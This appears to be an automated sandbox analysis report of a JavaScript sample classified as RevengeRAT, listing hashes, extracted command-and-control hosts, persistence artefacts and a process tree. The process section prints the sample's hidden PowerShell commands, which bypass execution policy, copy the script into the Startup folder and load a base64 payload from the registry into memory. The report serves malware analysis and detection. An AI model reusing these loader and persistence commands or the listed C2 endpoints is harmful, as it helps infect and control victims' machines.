Analysis
max time kernel: 148s
max time network: 149s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 19-03-2024 23:15
Static task: static1

Behavioral task: behavioral1
  Sample: d7520f1f5438e4e82c1234fbcb10c6dc.js
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: d7520f1f5438e4e82c1234fbcb10c6dc.js
  Resource: win10v2004-20231215-en
General
Target: d7520f1f5438e4e82c1234fbcb10c6dc.js
Size: 32KB
MD5: d7520f1f5438e4e82c1234fbcb10c6dc
SHA1: 3519cb4f9c82611a9a40e3d15b3fb5432bad023e
SHA256: 1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a
SHA512: 2f7069d30f6d6e078510f7052370eeb0b13a13bc46c1482a213dcb224d1996ea2243b8a52962b4d1617f7359ebfd9e832d33762f61cfab92476ea82120bacfa3
SSDEEP: 768:PhbHMfBd7PENmw5hWh70OyDbod+wvlJKAiv6AGi0/ZWThQ:5HMfzemquy3od+wvlJKAi9Gi0B2Q
Malware Config
Extracted
revengerat
Office
workwinrarhost.ddns.com.br:333
office.minhaempresa.tv:333
RV_MUTEX-ViGGjjtnxDpnFw
Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.

RevengeRat Executable (1 IoC)
resource: behavioral1/memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp
yara_rule: revengerat

Blocklisted process makes network request (20 IoCs)
process: powershell.exe (PID 2828)
flows: 3, 4, 6, 7, 8, 9, 10, 11, 12, 14, 15, 17, 18, 19, 20, 21, 22, 23, 25, 26

Drops startup file (2 IoCs)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs (process: powershell.exe)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js (process: powershell.exe)

Adds Run key to start application (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (process: powershell.exe)

Drops file in System32 directory (1 IoC)
File opened for modification: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (process: powershell.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid 2828 powershell.exe
pid 2832 powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Token: SeDebugPrivilege, pid 2828 powershell.exe
Token: SeDebugPrivilege, pid 2832 powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
PID 272 (wscript.exe) wrote to memory of PID 2832 (powershell.exe), 3 times
PID 272 (wscript.exe) wrote to memory of PID 2828 (powershell.exe), 3 times
Processes

C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js
  Signatures:
  - Suspicious use of WriteProcessMemory

  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"
    Signatures:
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
    Signatures:
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: f19d9ea6a6a0d49bf8b37f9575e94712
  SHA1: 789cd1284971429d4677f3694508c619703899ce
  SHA256: a4bc1eb07371da6a6a59fbc8cfa947003825544823fd81baa17a7a288158083d
  SHA512: 592665aa84aecb432a1c8c4ebae6a25bdab0875cee1376e7485757477c2cf7e9ff5d6e52a4dcc3414cce62fd3ae30a764ffff93c55023ffc1a275f3b6aae186d

memory/2828-19-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2828-10-0x00000000024F0000-0x00000000024F8000-memory.dmp
  Filesize: 32KB

memory/2828-29-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp
  Filesize: 40KB

memory/2828-27-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2828-28-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2828-26-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2828-16-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2828-17-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2828-18-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2828-21-0x0000000002520000-0x00000000025A0000-memory.dmp
  Filesize: 512KB

memory/2832-20-0x00000000025A0000-0x0000000002620000-memory.dmp
  Filesize: 512KB

memory/2832-22-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2832-23-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2832-25-0x00000000025A0000-0x0000000002620000-memory.dmp
  Filesize: 512KB

memory/2832-24-0x00000000025A0000-0x0000000002620000-memory.dmp
  Filesize: 512KB

memory/2832-14-0x00000000025A0000-0x0000000002620000-memory.dmp
  Filesize: 512KB

memory/2832-15-0x00000000025A0000-0x0000000002620000-memory.dmp
  Filesize: 512KB

memory/2832-13-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
  Filesize: 9.6MB

memory/2832-9-0x000000001B190000-0x000000001B472000-memory.dmp
  Filesize: 2.9MB